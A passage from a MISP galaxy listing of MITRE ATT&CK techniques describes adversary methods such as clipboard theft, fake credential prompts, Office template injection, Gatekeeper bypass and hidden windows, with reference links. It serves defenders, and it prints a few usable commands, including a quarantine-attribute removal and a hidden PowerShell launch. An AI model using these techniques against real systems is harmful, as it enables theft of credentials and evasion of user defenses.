  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333" with estimative-language:likelihood-probability="almost-certain"

Table 6237. Table References

Links

https://attack.mitre.org/techniques/T1311

Email Collection - T1114

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

The tag is: misp-galaxy:mitre-attack-pattern="Email Collection - T1114"

Table 6238. Table References

Links

https://attack.mitre.org/techniques/T1114

https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

Input Prompt - T1411

The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.

Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)

Specific approaches to this technique include:

Impersonate the identity of a legitimate application

A malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)

Display a prompt on top of a running legitimate application

A malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the ActivityManager API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:

  • A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)

  • A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the SYSTEM_ALERT_WINDOW permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The SYSTEM_ALERT_WINDOW permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

Input Prompt - T1141

When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).

The tag is: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141"

Table 6240. Table References

Links

https://attack.mitre.org/techniques/T1141

https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html

https://capec.mitre.org/data/definitions/569.html

https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

https://logrhythm.com/blog/do-you-trust-your-computer/

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Clipboard Data - T1115

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

For example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)

macOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"

Table 6241. Table References

Links

https://attack.mitre.org/techniques/T1115

https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip

https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363

https://msdn.microsoft.com/en-us/library/ms649012

https://www.cisa.gov/uscert/ncas/alerts/aa21-200b

LC_LOAD_DYLIB Addition - T1161

Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).

The tag is: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161"

Table 6242. Table References

Links

https://attack.mitre.org/techniques/T1161

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Code Signing - T1116

Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing - T1116"

Table 6243. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

http://www.thesafemac.com/new-signed-malware-called-janicab/

https://attack.mitre.org/techniques/T1116

https://en.wikipedia.org/wiki/Code_signing

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

Automated Collection - T1119

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.

The tag is: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119"

Table 6244. Table References

Links

https://attack.mitre.org/techniques/T1119

Template Injection - T1221

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)

Adversaries may also modify the <code>*\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)

This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Template Injection - T1221"

Table 6245. Table References

Links

http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html

https://attack.mitre.org/techniques/T1221

https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/

https://blog.talosintelligence.com/2017/07/template-injection.html

https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/

https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)

https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

https://github.com/ryhanson/phishery

https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread

https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780

Audio Capture - T1123

An adversary can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

The tag is: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123"

Table 6246. Table References

Links

https://attack.mitre.org/techniques/T1123

Data Encoding - T1132

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132"

Table 6247. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1132

https://en.wikipedia.org/wiki/Binary-to-text_encoding

https://en.wikipedia.org/wiki/Character_encoding

Encrypted Channel - T1521

Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1521"

Table 6248. Table References

Links

https://attack.mitre.org/techniques/T1521

Video Capture - T1512

An adversary can leverage a device’s cameras to gather information by capturing video recordings. Images may also be captured, potentially in specified intervals, in lieu of video files.

Malware or scripts may interact with the device cameras through an available API provided by the operating system. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1513) due to use of the device’s cameras for video recording rather than capturing the victim’s screen.

In Android, an application must hold the android.permission.CAMERA permission to access the cameras. In iOS, applications must include the NSCameraUsageDescription key in the Info.plist file. In both cases, the user must grant permission to the requesting application to use the camera. If the device has been rooted or jailbroken, an adversary may be able to access the camera without knowledge of the user.

The tag is: misp-galaxy:mitre-attack-pattern="Video Capture - T1512"

Table 6249. Table References

Links

https://attack.mitre.org/techniques/T1512

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

Video Capture - T1125

An adversary can leverage a computer’s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim’s screen.

In macOS, there are a few different malware samples that record the user’s webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)

The tag is: misp-galaxy:mitre-attack-pattern="Video Capture - T1125"

Table 6250. Table References

Links

https://attack.mitre.org/techniques/T1125

https://objective-see.com/blog/blog_0x25.html

Login Item - T1162

MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user’s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user’s <code>~/Library/Preferences/</code> directory in a plist file called <code>com.apple.loginitems.plist</code> (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method <code> SMLoginItemSetEnabled </code> can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well (Citation: Adding Login Items).

The tag is: misp-galaxy:mitre-attack-pattern="Login Item - T1162"

Table 6251. Table References

Links

https://attack.mitre.org/techniques/T1162

https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

https://capec.mitre.org/data/definitions/564.html

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Domain Fronting - T1172

Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172"

Table 6252. Table References

Links

http://www.icir.org/vern/papers/meek-PETS-2015.pdf

https://attack.mitre.org/techniques/T1172

AppCert DLLs - T1182

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182"

Table 6253. Table References

Links

https://attack.mitre.org/techniques/T1182

https://forum.sysinternals.com/appcertdlls_topic12546.html

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192"

Table 6254. Table References

Links

https://attack.mitre.org/techniques/T1192

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

https://capec.mitre.org/data/definitions/163.html

Shared Modules - T1129

Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.

The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in dlfcn.h in functions such as dlopen and dlsym. Although macOS can execute .so files, common practice uses .dylib files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)

The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like LoadLibrary at run time.(Citation: Microsoft DLL)

The tag is: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129"

Table 6255. Table References

Links

https://attack.mitre.org/techniques/T1129

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library

https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/

Obfuscate infrastructure - T1331

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331"

Obfuscate infrastructure - T1331 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309" with estimative-language:likelihood-probability="almost-certain"

Table 6256. Table References

Links

https://attack.mitre.org/techniques/T1331

Hidden Window - T1143

Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.

Windows

There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)

Mac

The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143"

Table 6257. Table References

Links

https://attack.mitre.org/techniques/T1143

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1

Screen Capture - T1513

Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android MediaProjectionManager (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android screencap or screenrecord commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"

Table 6258. Table References

Links

https://attack.mitre.org/techniques/T1513

https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/

https://developer.android.com/reference/android/media/projection/MediaProjectionManager

https://developer.android.com/studio/command-line/adb

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html

https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html

https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

Create Account - T1136

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

The tag is: misp-galaxy:mitre-attack-pattern="Create Account - T1136"

Table 6259. Table References

Links

https://attack.mitre.org/techniques/T1136

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Process Injection - T1631

Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

Both Android and iOS have no legitimate way to achieve process injection. The only way this is possible is by abusing existing root access or exploiting a vulnerability.

The tag is: misp-galaxy:mitre-attack-pattern="Process Injection - T1631"

Table 6260. Table References

Links

https://attack.mitre.org/techniques/T1631

Application Shimming - T1138

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • <code>%WINDIR%\AppPatch\sysmain.sdb</code>

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

  • <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code>

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.

The tag is: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138"

Table 6261. Table References

Links

https://attack.mitre.org/techniques/T1138

https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Authentication attempt - T1381

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)

The tag is: misp-galaxy:mitre-attack-pattern="Authentication attempt - T1381"

Table 6262. Table References

Links

https://attack.mitre.org/techniques/T1381

Spearphishing Attachment - T1193

Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193"

Table 6263. Table References

Links

https://attack.mitre.org/techniques/T1193

https://capec.mitre.org/data/definitions/163.html

Bash History - T1139

Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: misp-galaxy:mitre-attack-pattern="Bash History - T1139"

Table 6264. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1139

Gatekeeper Bypass - T1144

In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple’s Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.

Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command <code>xattr /path/to/MyApp.app</code> for <code>com.apple.quarantine</code>. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, <code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)

In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)

The tag is: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144"

Table 6265. Table References

Links

https://attack.mitre.org/techniques/T1144

https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/

https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Clipboard Data - T1414

Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard)

On Android, applications can use the ClipboardManager.OnPrimaryClipChangedListener() API to register as a listener and monitor the clipboard for changes. However, starting in Android 10, this can only be used if the application is in the foreground, or is set as the device’s default input method editor (IME).(Citation: Github Capture Clipboard 2019)(Citation: Android 10 Privacy Changes)

On iOS, this can be accomplished by accessing the UIPasteboard.general.string field. However, starting in iOS 14, upon accessing the clipboard, the user will be shown a system notification if the accessed text originated in a different application. For example, if the user copies the text of an iMessage from the Messages application, the notification will read “application_name has pasted from Messages” when the text was pasted in a different application.(Citation: UIPPasteboard)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1414"

Table 6266. Table References

Links

http://saschafahl.de/static/paper/pwmanagers2013.pdf

https://attack.mitre.org/techniques/T1414

https://developer.android.com/about/versions/10/privacy/changes#clipboard-data

https://developer.apple.com/documentation/uikit/uipasteboard

https://github.com/grepx/android-clipboard-security

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html

Foreground Persistence - T1541

Adversaries may abuse Android’s startForeground() API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s startForeground() API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)

Malicious applications may abuse the startForeground() API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device’s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)

